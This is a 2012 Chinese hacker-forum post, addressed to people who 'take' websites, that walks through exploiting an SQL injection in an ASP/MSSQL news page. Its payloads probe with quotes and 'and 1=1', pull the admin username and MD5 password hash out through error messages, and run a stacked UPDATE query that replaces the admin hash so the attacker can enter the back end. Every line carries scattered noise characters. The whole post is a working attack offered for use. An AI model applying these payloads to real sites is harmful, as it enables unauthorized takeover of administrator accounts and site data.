经常拿站的黑阔们一定经常碰到,某个网站有注入,管理员帐号和密码多暴出来了。* Q9 ^7 [, [; V. n K
可是密码是MD5加密的。而且在线的MD5解密不了。你说咋办?直接修改管理员密码的MD5值。然后进后台!(当然是有条件的。MSSQL)' r' \; N$ S; F% V+ g
测试如下: z: X" n% J, H# ~4 V5 ^
http://www.tmdsb.com/news.asp?id=121
4 Q8 S! V6 z5 M8 i在地址后输入单引号,显示4 I3 u0 h v# Z9 M+ o7 @; D
Microsoft OLE DB Provider for SQL Server 错误 ’80040e14’
: g$ l( z' @1 p8 F7 [* q字符串 ’’’ 之前有未闭合的引号
: g6 ~+ J T/ E# w/news/tmdws.asp,行63
7 p! R2 L) y8 Y) `, T" J说明没有过滤单引号且数据库是MSSQL.
) e" b& C+ P8 A+ `and 1=1正常。and 1=2出错。肯定存在注入
6 O( D: Y, N7 X7 H7 }接着输入& T) U( Z l" z( P) v, A
http://www.tmdsb.com/news.asp?id=1 or admin_user in (select id from admin)' w2 E4 k' e: b0 H% n: [
得到帐号为:admin0 C6 G& Z% j( z* e7 E+ |& |5 |
http://www.tmdsb.com/news.asp?id=121 or admin_password in (select id from admin)( R& x. h4 y' r& G7 k8 {) V
得到密码为:a4716077c2ba075c$ _% W' W. R$ u5 E
接下来我们就可以改密码了。但我们先前要知道我们加密的字符:e8dc763194f29433
( } x& n0 h- k命令如下 :
3 Y+ c6 W, x* ~7 `: ];update shop_admin set password=’e8dc763194f29433’ where password=’a4716077c2ba075c’–; E6 ^4 o r& t+ `% w- p- _2 a
这句的意思就是用e8dc763194f29433替换a4716077c2ba075c,以达到修改密码的目的 |
发表于 2012-9-13 17:55:24
收藏
支持
反对
发表于 2012-9-14 16:22:41